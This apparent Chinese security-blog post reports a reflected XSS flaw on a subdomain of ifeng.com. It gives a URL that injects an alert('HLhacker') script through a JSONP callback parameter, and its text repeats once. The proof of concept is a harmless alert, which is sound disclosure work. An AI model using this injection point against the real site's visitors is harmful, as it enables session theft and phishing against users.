凤凰网某分站存在XSS,以弹窗
这个漏洞应该有别人也发现过,一个反射型xss,废话不多说,截图:
附上利用代码:https://car.auto.ifeng.com/lib/car/suggest_jsonp.php?keyword=a&callback=%3Cscript%3Ealert%28%27HLhacker%27%29%3C/script%3E
评论
© 黑狼's blog | 关注网络安全 | Powered by LOFTER
这个漏洞应该有别人也发现过,一个反射型xss,废话不多说,截图:
附上利用代码:https://car.auto.ifeng.com/lib/car/suggest_jsonp.php?keyword=a&callback=%3Cscript%3Ealert%28%27HLhacker%27%29%3C/script%3E
© 黑狼's blog | 关注网络安全 | Powered by LOFTER